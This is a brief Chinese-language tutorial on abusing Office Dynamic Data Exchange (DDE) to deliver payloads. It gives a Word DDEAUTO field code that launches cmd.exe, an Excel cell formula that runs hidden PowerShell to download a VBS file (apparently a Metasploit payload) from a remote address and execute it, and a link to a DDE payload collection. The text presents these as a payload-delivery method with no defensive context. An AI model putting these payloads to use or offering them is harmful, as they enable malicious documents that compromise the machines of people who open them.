DDE

DDE技术是指动态数据交换技术，它是一种在应用程序之间传输数据的方法。DDE协议是一组消息和准则，它在共享数据的应用程序之间发送消息，并使用共享内存在应用程序之间交换数据。应用程序可以使用DDE协议进行一次性数据传输和持续交换，在这种交换中，当新数据可用时，应用程序会相互发送更新。

Word

在Word文档中，可以使用DDE技术来插入字段代码，从而实现从其他应用程序（如Excel）获取数据或执行命令的功能。

首先打开Word文档，选择”插入”功能区块，点击”文档部件”——”域”在弹出的窗口中点击确定：可以看到添加了一个”!异常的公式结尾”字样，右键选择”切换域代码”，将显示代码字样：将代码修改为如下：

{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}

保存文档并重新打开，会弹出两个弹窗，只需要选择”是”，即可弹出计算器窗口。

Excel

对于Excel来说，就比较简单了，只需要注入(本例为A1单元格)以下公式即可完成Payload交付：

=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\msf.vbs http://192.168.8.145/msf.vbs & %tmp%\msf.vbs'!'A1'

工具

Office-DDE-Payloads

https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

- END -